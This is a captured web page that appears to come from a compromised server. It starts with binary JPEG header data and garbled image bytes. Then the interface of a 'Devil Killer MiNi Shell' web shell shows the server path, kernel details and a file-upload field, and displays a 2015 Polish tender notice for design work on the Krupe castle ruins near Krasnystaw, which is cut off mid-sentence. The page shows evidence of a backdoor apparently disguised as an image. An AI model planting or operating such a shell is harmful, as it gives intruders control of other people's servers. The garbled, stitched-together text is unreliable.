JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150515/114326-N-2015.html

<p class="kh_header"><b>Krasnystaw: Opracowanie koncepcji oraz 
dokumentacji projektowej zagospodarowania ruin zamku w Krupem Gm. Krasnystaw w 
ramach projektu pn. Wzmocnienie spójności społecznej, gospodarczej i 
terytorialnej w obszarze funkcjonalnym szlaku Jana III Sobieskiego w 
województwie lubelskim.</b><br>
<b>Numer ogłoszenia: 114326 - 2015; data zamieszczenia: 15.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasnystaw , ul. M. Konopnickiej 4, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5763753, faks 082 5763046.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnystaw.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji oraz 
dokumentacji projektowej zagospodarowania ruin zamku w Krupem Gm. Krasnystaw w 
ramach projektu pn. Wzmocnienie spójności społecznej, gospodarczej i 
terytorialnej w obszarze funkcjonalnym szlaku Jana III Sobieskiego w 
województwie lubelskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: 
1. Przedmiotem zamówienia jest opracowanie koncepcji oraz dokumentacji 
projektowej zagospodarowania ruin zamku w Krupem, które obejmuje wykonanie:
 1.1 badań archeologicznych i architektonicznych w zakresie niezbędnym do 
opracowania koncepcji i dokumentacji projektowej, 1.2 koncepcji 
zagospodarowania, 1.3 dokumentacji projektowo - kosztorysowej w tym: a) projektu 
budowlanego, b) projektu wykonawczego, c) przedmiarów robót wraz z kosztorysami 
inwestorskimi, d) specyfikacje techniczne wykonania i odbioru robót budowlanych,
 2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do:
 2.1 przeprowadzenia pełnej kwerendy materiałów archiwalnych zasobów krajowych z 
wykonaniem kopii dla zamawiającego, 2.2 przeprowadzenia badań archeologicznych i 
architektonicznych obejmujących m.in.: a) badania w obszarze części środkowej 
zamku (dziedzińca górnego) w zakresie niezbędnym do opracowania koncepcji i 
dokumentacji projektowej, oraz badania sondażowe (miejscowe) w obrębie 
dziedzińca wielkiego umożliwiające wyznaczenie przebiegu murów kurtynowych i 
zasięgu fosy, b) opracowania inwentaryzacji fotogrametrycznej murów zamku,
 2.3 sporządzania stosownych opracowań i dokumentacji w formie zarówno 
papierowej jak i elektronicznej w systemie CAD z wizualizacją komputerową 3D w 
zakresie opracowania odwzorowania przestrzennego terenu docelowo dla potrzeb 
realizacji przedmiotowego zamówienia jak i możliwości ich wykorzystania dla 
celów promocyjnych obiektu, 2.4 dokonania oceny stanu zachowania zabytku poprzez 
m.in. przeprowadzenie wielokierunkowych badań będących podstawą opracowania 
programów konserwatorskich wraz ze stosowną pełną dokumentacją w tym zakresie, 
wykonania ekspertyzy konstrukcjo - budowlanej zamku (uwzględniającej w/w 
badania) pod względem bezpieczeństwa ruin zamku wraz z określeniem występujących 
zagrożeń z podaniem zakresu niezbędnych prac zabezpieczających wraz z 
dokumentacją fotograficzną, 2.5 opracowania na podstawie powyższych badań i 
ekspertyz m.in. koncepcji programowej uatrakcyjnienia zamku, programów 
określających zakres prac konserwatorskich przy detalu architektonicznym i 
elementach sgraffita i niezbędnej dokumentacji określającej postępowanie 
konserwatorskie przy adaptacji pomieszczeń zamku części piwnicznych na potrzeby 
obsługi ruchu turystycznego oraz obsługi imprez plenerowych, jakie się odbywają 
na zamku, 2.6 opracowania dokumentacji projektowej zgodnie z wymaganiami prawa 
budowlanego z uwzględnieniem przepisów w zakresie prowadzenia robót na zabytkach 
nieruchomych, z uzyskaniem wszystkich wymaganych prawem uzgodnień i opinii 
administracyjnych niezbędnych do uzyskania pozwolenia na budowę, 
2.7 wyeksponowania w dokumentacji projektowej wartości historycznych poprzez 
przygotowanie opracowania trasy zwiedzania zamku wraz iluminacją obiektu i 
zaprojektowaniem minimalnego parkingu, 2.8 wykonanie podziału działki Nr 770 
(obręb: Krupe) pow. 0,70 ha w celu włączenia całej suchej fosy w zakres prac 
rewitalizacyjnych oraz geodezyjne wyznaczenie lokalizacji i przebiegu murów 
kurtynowych po wykonaniu badań archeologicznych sondażowych, 3. Wymagania w 
zakresie adaptacji pomieszczeń piwnicznych: 3.1. wymaga się by wszystkie 
materiały określone w projektach budowlano - wykonawczych, w tym materiały 
wykończeniowe charakteryzowały się wysoką odpornością na czynniki zewnętrzne np. 
wysoka wilgotność, niskie temperatury itp., 3.2 przewiduje się zaprojektowanie 
wewnętrznej instalacji wod - kan, i elektrycznej wraz z przyłączami. 4. 
Szczegółowy opis przedmiotu zamówienia określa załącznik Nr 8 do SIWZ oraz 
załączniki do SIWZ: 4.1 Załącznik Nr 9 - Wytyczne Wojewódzkiego Konserwatora 
Zabytków w Lublinie Delegatura w Chełmie w zakresie możliwości prac na obiekcie 
ruin zamku w Krupem, 4.2 Załącznik Nr 10 - Wnioski z konsultacji społecznych w 
zakresie prac, jakie powinny być wykonane na obiekcie. 4.3 Załącznik Nr 11 - 
Mapy przedstawiające stan istniejący. 4.4 Załącznik Nr 12 - Zdjęcia obiektu - 
stan aktualny. 4.5 Załącznik Nr 13 - Wizualizacja - przykładowy sposób 
zagospodarowani ruin zamku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacja na temat wadium: 1. Przystępując do niniejszego postępowania każdy 
Wykonawca zobowiązany jest wnieść wadium w wysokości 3 000,00 zł (słownie: trzy 
tysiące złotych 00/100). 2. Wadium należy wnieść w jednej lub kilku 
następujących formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.: a) 
pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem 
pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) 
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 
ustawy z dna 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.). 3. Wykonawca 
zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w 
pieniądzu należy przelać na konto Zamawiającego: Nr 21 8200 0008 2001 0000 2189 
0005 w Banku Spółdzielczym w Krasnymstawie. 4. W przypadku wadium wnoszonego w 
pieniądzu za termin wpłynięcia wadium uznaje się termin jego wniesienia. Przez 
wniesienie rozumie się uznanie kwoty wadium na rachunku Zamawiającego. Do oferty 
należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek 
Zamawiającego. Wadium wnoszone w pieniądzu powinno fizycznie znajdować się na 
koncie Zamawiającego przed upływem terminu składania ofert pod rygorem 
wykluczenia Wykonawcy (art. 24 ust. 2 pkt 2 uPzp). W przypadku wniesienia wadium 
w innej formie niż pieniądz - oryginał dokumentu należy złożyć w osobnej 
kopercie opisanej Wadium - wykonanie prac na potrzeby projektu Opracowanie 
koncepcji oraz dokumentacji projektowej zagospodarowania ruin zamku w Krupem w 
Gm. Krasnystaw w ramach projektu pn. wzmocnienie spójności społecznej, 
gospodarczej i terytorialnej w obszarze funkcjonalnym szlaku Jana III 
Sobieskiego w województwie lubelskim oraz włożyć do koperty zewnętrznej, 5. 
Wadium wniesione w formie innej niż pieniężna musi spełniać następujące 
wymagania: a) odpowiadać co do wartości wysokości wadium określonej w SIWZ, b) 
musi odpowiadać, co do terminu ważności terminowi związania ofertą określonemu w 
SIWZ, zawierać w swej treści okoliczności (zgodnie z art. 46 ust. 4a i 5 ustawy 
Pzp), w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z 
klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez 
protestu gwaranta (poręczyciela), 6. Zamawiający zwróci niezwłocznie wadium na 
zasadach określonych w art. 46 ustawy Pzp. 7. Zamawiający zatrzyma wadium wraz z 
odsetkami jeżeli Wykonawca, którego oferta została wybrana: a) odmówi podpisania 
umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie b) nie 
wniósł wymaganego zabezpieczenia należytego wykonania umowy, c) zawarcie umowy w 
sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po 
stronie Wykonawcy 8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp , 
z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o 
których mowa w art. 25 ust. 1 u ustawy Pzp, pełnomocnictw, listy podmiotów 
należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 
ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie 
wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy 
Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę, 
jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku zamawiający nie wymaga posiadania przez 
    Wykonawcę specjalnych uprawnień. Ocena spełniania warunków dokonana zostanie 
    w oparciu o informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni podany warunek, jeżeli wykaże należyte wykonanie w okresie 
    ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, co najmniej: a) 
    jednej usługi polegającej na opracowaniu dokumentacji projektowej dot. 
    wykonania robót budowlanych, obejmujących, co najmniej remont lub renowację, 
    obiektów wpisanych do Rejestru Zabytków o wartości usługi powyżej 70 000 zł 
    brutto. b) jednej usługi polegającej na wykonaniu badań archeologicznych lub 
    architektonicznych obiektów wpisanych do rejestru zabytków. Ocena spełniania 
    warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i 
    oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. 
    Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w 
    dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek podany, jeżeli wykaże, że dysponuje lub będzie 
    dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć 
    w wykonywaniu zamówienia, tj. posiadającymi uprawnienia projektowe określone 
    przepisami Prawa budowlanego w następujących specjalnościach: a) min. 1 
    osobą - posiadającą uprawnienia budowlane do projektowania w specjalności 
    architektonicznej bez ograniczeń, b) min. 1 osobą - posiadającą uprawnienia 
    budowlane do projektowania w specjalności konstrukcyjno - budowlanej bez 
    ograniczeń, Ocena spełniania warunków dokonana zostanie w oparciu o 
    informacje zawarte w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. 
    Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w 
    dokumentach i oświadczeniach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych usług potwierdzających należyte wykonanie w okresie 
  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
  prowadzenia działalności jest krótszy - w tym okresie co najmniej: a) jednej 
  usługi polegającej na opracowaniu dokumentacji projektowej dot. wykonania 
  robót budowlanych, obejmujących, co najmniej remont lub renowację, obiektów 
  wpisanych do Rejestru Zabytków o wartości usługi powyżej 70 000 zł brutto. b) 
  jednej usługi polegającej na wykonaniu badań archeologicznych lub 
  architektonicznych obiektów wpisanych do rejestru zabytków, - wraz z podaniem 
  ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi 
  zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są 
  wykonywane należycie - sporządzonego zgodnie z załącznikiem nr 4 do SIWZ;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub 
ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go 
z nimi. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż 
będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności 
przedstawiając w tym celu pisemne zobowiązanie, tych podmiotów do oddania mu do 
dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który 
zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, 
odpowiada solidarnie z wykonawcą za szkodę powstałą u zamawiającego wskutek nie 
udostępnienia tych zasobów, chyba, że za nie udostępnienie zasobów nie ponosi 
winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w 	sposób następujący:
1.	Zamawiający przewiduje możliwość zmiany terminu wykonania przedmiotu umowy:
a)	w przypadku wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
b)	wystąpienia sytuacji gdy wykonanie zamówienia w pierwotnym terminie nie leży w interesie zamawiającego (o okres umożliwiający osiągnięcie uzasadnionego interesu zamawiającego),
c)	nieuzyskania przez Wykonawcę od właściwych organów dokumentów niezbędnych do wykonania przedmiotu umowy, pomimo dołożonej należytej staranności,
d)	w przypadku działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty w określonym umownie terminie,
e)	z powodu zmian prawa o charakterze bezwzględnie obowiązującym: - powodujących konieczność wydłużenia procesu projektowania (dodatkowe czynności prawne i faktyczne nakazane prawem nie występujące w dacie zawarcia umowy chyba, że ww. zmiany prawa winny być znane stronom w sytuacji odłożonego ich wejścia w życie),
f)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia;
g)	w przypadku, gdy konieczność wprowadzenia zmian będzie następstwem zmiany terminu realizacji projektu, wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na wykonanie usługi.
2. Zmiany osobowe:
a) zmiana osób przy pomocy których wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ. Zamiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury wynikającej z przepisów prawa i SIWZ.
b) możliwa jest zmiana umowy w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego: możliwe jest powierzenie podwykonawcom innej części usługi niż wskazano w ofercie wykonawcy, a także możliwa jest zmiana podwykonawcy na etapie realizacji umowy o ile nie sprzeciwia się to postanowieniom SIWZ. Zamiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ.
c) Zamawiający dopuszcza możliwość wyrażenia zgody na wykonywanie usługi przez podwykonawców nie wskazanych w ofercie lub zakres nie wskazany w ofercie, jako planowany do powierzenia podwykonawcom. Zamiana taka nie wymaga aneksu do umowy.
i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ.
3. Inne zmiany
a) zmiany zakresu dokumentacji technicznej, wynikające z uzgodnień na etapie opracowywania audytu energetycznego,
b)	zmiany zasad płatności,
c)	zmiany zakresu prac powierzonych podwykonawcy lub zgłoszenia udział 	podwykonawcy,
d)	zmiany oznaczenia danych Stron,
e)	zmiany stawki podatku od towarów i usług (VAT) przewiduje się możliwość zmiany kwoty brutto o różnicę wynikającą z tej zmiany zgodnie z obowiązującymi przepisami. Zmiana stawek pozostałych podatków nie będzie podstawą do zmiany wynagrodzenia.
4. Warunki dokonywania zmian:
a)	Inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego.
b)	Wprowadzenie zmiany pozwoli na prawidłową realizacją przedmiotu umowy.
c)	Dokonanie zmiany za zgodą Zamawiającego.
d)	Forma pisemna w postaci aneksu do umowy pod rygorem nieważności umowy z wyłączeniem okoliczności wymienionych w rozdziale.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugkrasnystaw.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Krasnystaw, ul. M. Konopnickiej 4, 22-300 Krasnystaw, pokój nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2015 godzina 12:00, miejsce: Sekretariat Urzędu Gminy Krasnystaw, 
ul. M. Konopnickiej 4, 22-300 Krasnystaw, pokój 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie zamierza ustanawiać dynamicznego 
